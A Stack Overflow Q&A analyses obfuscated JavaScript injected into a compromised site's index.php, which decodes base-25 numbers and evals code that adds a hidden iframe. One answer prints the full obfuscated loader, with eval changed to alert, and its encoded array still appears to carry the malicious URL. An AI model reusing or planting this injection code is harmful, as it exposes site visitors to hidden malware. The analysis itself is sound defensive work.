# Why this obfuscated code is malicious in JavaScript?

Tags: javascript, obfuscation, deobfuscation

A friend of mine's site was being listed as malicious, and we found some obfuscated code that had been injected into his index.php without him knowing. I deobfuscated the code down two levels and found this:

[(code can be viewed in the edit history)](https://stackoverflow.com/revisions/13313287/2)

Can anyone tell me what it's trying to do and why it's malicious..?

Comment: replace `eval` with `alert` to see what it does.

Answer (score 12, accepted):

To summarize, the code "decodes" HTML which places an `<iframe>` that loads in a malicious URL.

The following line has the "encoded" HTML:

```
n = ["9","9","45","42", ...
```

Each number represents a character that is in base-25. The code will loop through this array and use javascript's `String.fromCharCode()` to convert it to an ASCII character. After all of this, it will `eval()` it to place it on the page.

The "decoded" javascript is:

```
if (document.getElementsByTagName('body')[0]){
    iframer();
} else {
    document.write("<iframe src='[stripped]' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
    var f = document.createElement('iframe');f.setAttribute('src','[stripped]');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
```

Note, I have stripped the malicious URL from the code for safety purposes.

Comment: Thanks! I was just curious as to what it was doing and how.

Answer (score 2):

It injects a hidden iframe into the page, linked to what may well be a dodgy site.  Here's a safe version of the code you can run and see what it tries to inject...

http://jsfiddle.net/FqtZ8/

I visited the site it links to and chrome warned me of malware, so I went no further.

```
try{
if(window.document) window["document"]["body"]="123"
}catch(bawetawe){
if(window.document){
v=window;
try{
fawbe--
}catch(afnwenew){
try{
(v+v)()
}catch(gngrthn){
try{if(020===0x10)v["document"]["body"]="123"
}catch(gfdnfdgber){
m=123;
if((alert+"").indexOf("na"+"ti"+"ve")!==-1)ev=window["eval"];
}
}
n=            ["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","    j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1g","4n","d","9","9","9","45","42","4e","3m","49","41","4e","1f","1g","29","d","9","9","50","17","41","48","4f","41","17","4n","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","4j","4e","45","4g","41","1f","19","2a","45","42","4e","3m","49","41","17","4f","4e","3o","2b","1e","44","4g","4g","4c","28","1m","1m","43","3o","4d","40","4f","47","3m","4j","4f","4k","1l","41","40","4a","4f","1l","3n","45","4m","1m","4g","1m","4i","3o","1l","4c","44","4c","2d","43","4b","2b","20","1e","17","4j","45","40","4g","44","2b","1e","1o","1n","1e","17","44","41","45","43","44","4g","2b","1e","1o","1n","1e","17","4f","4g","4l","48","41","2b","1e","4i","45","4f","45","3n","45","48","45","4g","4l","28","44","45","40","40","41","4a","29","4c","4b","4f","45","4g","45","4b","4a","28","3m","3n","4f","4b","48","4h","4g","41","29","48","41","42","4g","28","1n","29","4g","4b","4c","28","1n","29","1e","2c","2a","1m","45","42","4e","3m","49","41","2c","19","1g","29","d","9","9","50","d","9","9","42","4h","4a","3o","4g","45","4b","4a","17","45","42","4e","3m","49","41","4e","1f","1g","4n","d","9","9","9","4i","3m","4e","17","42","17","2b","17","40","4b","3o","4h","49","41","4a","4g","1l","3o","4e","41","3m","4g","41","2j","48","41","49","41","4a","4g","1f","1e","45","42","4e","3m","49","41","1e","1g","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","4f","4e","3o","1e","1j","1e","44","4g","4g","4c","28","1m","1m","43","3o","4d","40","4f","47","3m","4j","4f","4k","1l","41","40","4a","4f","1l","3n","45","4m","1m","4g","1m","4i","3o","1l","4c","44","4c","2d","43","4b","2b","20","1e","1g","29","42","1l","4f","4g","4l","48","41","1l","4i","45","4f","45","3n","45","48","45","4g","4l","2b","1e","44","45","40","40","41","4a","1e","29","42","1l","4f","4g","4l","48","41","1l","4c","4b","4f","45","4g","45","4b","4a","2b","1e","3m","3n","4f","4b","48","4h","4g","41","1e","29","42","1l","4f","4g","4l","48","41","1l","48","41","42","4g","2b","1e","1n","1e","29","42","1l","4f","4g","4l","48","41","1l","4g","4b","4c","2b","1e","1n","1e","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","4j","45","40","4g","44","1e","1j","1e","1o","1n","1e","1g","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","44","41","45","43","44","4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h","44","45","48","40","1f","42","1g","29","d","9","9","50"];
h=2;
s="";
if(m) for(i=0;i-589!=0;i++){
k=i;
if(window["document"]) s+=String["fro"+"mC"+"harCode"](
parseInt(n[i],25)
);
}z=s;alert(z);
}
}
}?
```